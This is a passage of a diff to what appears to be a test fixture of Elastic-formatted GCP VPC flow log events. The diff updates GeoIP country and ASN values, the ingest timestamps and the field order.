"{\"insertId\":\"y4wffpfk2ero4\",\"jsonPayload\":{\"bytes_sent\":\"142871\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33572,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821149051Z\",\"packets_sent\":\"77\",\"reporter\":\"SRC\",\"rtt_msec\":\"335\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.470754779Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.470754779Z", @@ -9240,11 +9684,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33968, @@ -9322,7 +9771,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391663200Z", + "ingested": "2021-12-14T14:43:27.415221641Z", "original": "{\"insertId\":\"y4wffpfk2eror\",\"jsonPayload\":{\"bytes_sent\":\"158811\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33968,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.965119632Z\",\"packets_sent\":\"69\",\"reporter\":\"SRC\",\"rtt_msec\":\"201\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.480430427Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.480430427Z", @@ -9344,11 +9793,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33880, @@ -9420,7 +9874,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391668700Z", + "ingested": "2021-12-14T14:43:27.415222043Z", "original": "{\"insertId\":\"y4wffpfk2erob\",\"jsonPayload\":{\"bytes_sent\":\"13455\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33880},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821047175Z\",\"packets_sent\":\"81\",\"reporter\":\"DEST\",\"rtt_msec\":\"252\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.470071135Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.470071135Z", @@ -9431,16 +9885,51 @@ } }, { + "@timestamp": "2019-06-14T03:50:16.453Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.87.40.76", + "67.43.156.13" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 36 + } + }, + "source": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + } + }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 57300, @@ -9454,6 +9943,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415222489Z", + "original": "{\"insertId\":\"y4wffpfk2erox\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":57300,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:48:22.156322353Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:48:22.044604322Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "kind": "event", + "start": "2019-06-14T03:48:22.044604322Z", + "end": "2019-06-14T03:48:22.156322353Z", + "id": "y4wffpfk2erox", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -9465,25 +9964,24 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:16.453Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.87.40.76", - "67.43.156.13" + "67.43.156.13", + "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 36 - } - }, - "source": { + "destination": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -9494,23 +9992,14 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 210 + } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391674600Z", - "original": "{\"insertId\":\"y4wffpfk2erox\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":57300,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:48:22.156322353Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:48:22.044604322Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", - "kind": "event", - "start": "2019-06-14T03:48:22.044604322Z", - "end": "2019-06-14T03:48:22.156322353Z", - "id": "y4wffpfk2erox", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.139.99.242", "port": 9200, @@ -9519,13 +10008,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65315, @@ -9533,50 +10025,8 @@ "ip": "67.43.156.13", "packets": 728 }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:Q4aMH1aaXCHezhMNJFHYthlXz1Y=", - "bytes": 71014, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 728, - "direction": "inbound" - }, - "@timestamp": "2019-06-14T03:50:16.453Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "67.43.156.13", - "10.139.99.242" - ] - }, - "gcp": { - "destination": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 210 - } - } - }, "event": { - "ingested": "2021-12-09T13:37:46.391680200Z", + "ingested": "2021-12-14T14:43:27.415222887Z", "original": "{\"insertId\":\"y4wffpfk2eroc\",\"jsonPayload\":{\"bytes_sent\":\"71014\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65315},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220720811Z\",\"packets_sent\":\"728\",\"reporter\":\"DEST\",\"rtt_msec\":\"210\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.844068405Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.844068405Z", @@ -9584,6 +10034,18 @@ "id": "y4wffpfk2eroc", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:Q4aMH1aaXCHezhMNJFHYthlXz1Y=", + "bytes": 71014, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 728, + "direction": "inbound" } }, { @@ -9592,11 +10054,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -9674,7 +10141,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391685700Z", + "ingested": "2021-12-14T14:43:27.415223329Z", "original": "{\"insertId\":\"y4wffpfk2erok\",\"jsonPayload\":{\"bytes_sent\":\"60749\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33538},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"362\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500483335Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500483335Z", @@ -9690,11 +10157,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33880, @@ -9772,7 +10244,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391691100Z", + "ingested": "2021-12-14T14:43:27.415223715Z", "original": "{\"insertId\":\"y4wffpfk2eros\",\"jsonPayload\":{\"bytes_sent\":\"160451\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33880,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821138391Z\",\"packets_sent\":\"66\",\"reporter\":\"SRC\",\"rtt_msec\":\"252\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.470071135Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.470071135Z", @@ -9794,11 +10266,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -9870,7 +10347,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391696900Z", + "ingested": "2021-12-14T14:43:27.415224246Z", "original": "{\"insertId\":\"y4wffpfk2erod\",\"jsonPayload\":{\"bytes_sent\":\"169173\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33574,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821291282Z\",\"packets_sent\":\"64\",\"reporter\":\"DEST\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466811088Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466811088Z", @@ -9881,43 +10358,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" - }, - "as": { - "number": 33652 - }, - "address": "67.43.156.13", - "port": 65315, - "ip": "67.43.156.13" - }, - "source": { - "address": "10.139.99.242", - "port": 9200, - "bytes": 118762, - "packets": 615, - "domain": "elasticsearch", - "ip": "10.139.99.242" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:Q4aMH1aaXCHezhMNJFHYthlXz1Y=", - "bytes": 118762, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 615, - "direction": "outbound" - }, "@timestamp": "2019-06-14T03:50:16.453Z", "ecs": { "version": "1.12.0" @@ -9928,6 +10368,9 @@ "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", @@ -9948,8 +10391,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 65315, + "ip": "67.43.156.13" + }, + "source": { + "address": "10.139.99.242", + "port": 9200, + "bytes": 118762, + "packets": 615, + "domain": "elasticsearch", + "ip": "10.139.99.242" + }, "event": { - "ingested": "2021-12-09T13:37:46.391701100Z", + "ingested": "2021-12-14T14:43:27.415224640Z", "original": "{\"insertId\":\"y4wffpfk2ero6\",\"jsonPayload\":{\"bytes_sent\":\"118762\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65315,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220720811Z\",\"packets_sent\":\"615\",\"reporter\":\"SRC\",\"rtt_msec\":\"210\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.844068405Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.844068405Z", @@ -9957,6 +10425,18 @@ "id": "y4wffpfk2ero6", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:Q4aMH1aaXCHezhMNJFHYthlXz1Y=", + "bytes": 118762, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 615, + "direction": "outbound" } }, { @@ -9965,11 +10445,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -10047,7 +10532,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391705500Z", + "ingested": "2021-12-14T14:43:27.415225033Z", "original": "{\"insertId\":\"y4wffpfk2eron\",\"jsonPayload\":{\"bytes_sent\":\"11137\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33576},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"96\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510464198Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510464198Z", @@ -10058,41 +10543,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.87.40.76", - "port": 5601, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "source": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.13", - "port": 57300, - "bytes": 1458, - "ip": "67.43.156.13", - "packets": 7 - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:Xvu/n5tUKDHRNKc/db6OBLZgf9A=", - "bytes": 1458, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 7, - "direction": "inbound" - }, "@timestamp": "2019-06-14T03:50:16.453Z", "ecs": { "version": "1.12.0" @@ -10103,6 +10553,9 @@ "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -10123,8 +10576,33 @@ } } }, + "destination": { + "address": "10.87.40.76", + "port": 5601, + "domain": "kibana", + "ip": "10.87.40.76" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 57300, + "bytes": 1458, + "ip": "67.43.156.13", + "packets": 7 + }, "event": { - "ingested": "2021-12-09T13:37:46.391710600Z", + "ingested": "2021-12-14T14:43:27.415225423Z", "original": "{\"insertId\":\"y4wffpfk2eroy\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":57300},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:48:22.156322353Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:48:22.044604322Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:48:22.044604322Z", @@ -10132,44 +10610,21 @@ "id": "y4wffpfk2eroy", "category": "network", "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.13", - "port": 54662, - "ip": "67.43.156.13" - }, - "source": { - "address": "10.87.40.76", - "port": 5601, - "bytes": 1776, - "packets": 7, - "domain": "kibana", - "ip": "10.87.40.76" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:ODIAu0FZz5JAnJ3zuMNp2ecW7FE=", - "bytes": 1776, + "community_id": "1:Xvu/n5tUKDHRNKc/db6OBLZgf9A=", + "bytes": 1458, "transport": "tcp", "type": "ipv4", "iana_number": "6", "packets": 7, - "direction": "outbound" - }, + "direction": "inbound" + } + }, + { "@timestamp": "2019-06-14T03:50:16.453Z", "ecs": { "version": "1.12.0" @@ -10180,6 +10635,9 @@ "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", @@ -10200,8 +10658,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 54662, + "ip": "67.43.156.13" + }, + "source": { + "address": "10.87.40.76", + "port": 5601, + "bytes": 1776, + "packets": 7, + "domain": "kibana", + "ip": "10.87.40.76" + }, "event": { - "ingested": "2021-12-09T13:37:46.391715300Z", + "ingested": "2021-12-14T14:43:27.415225929Z", "original": 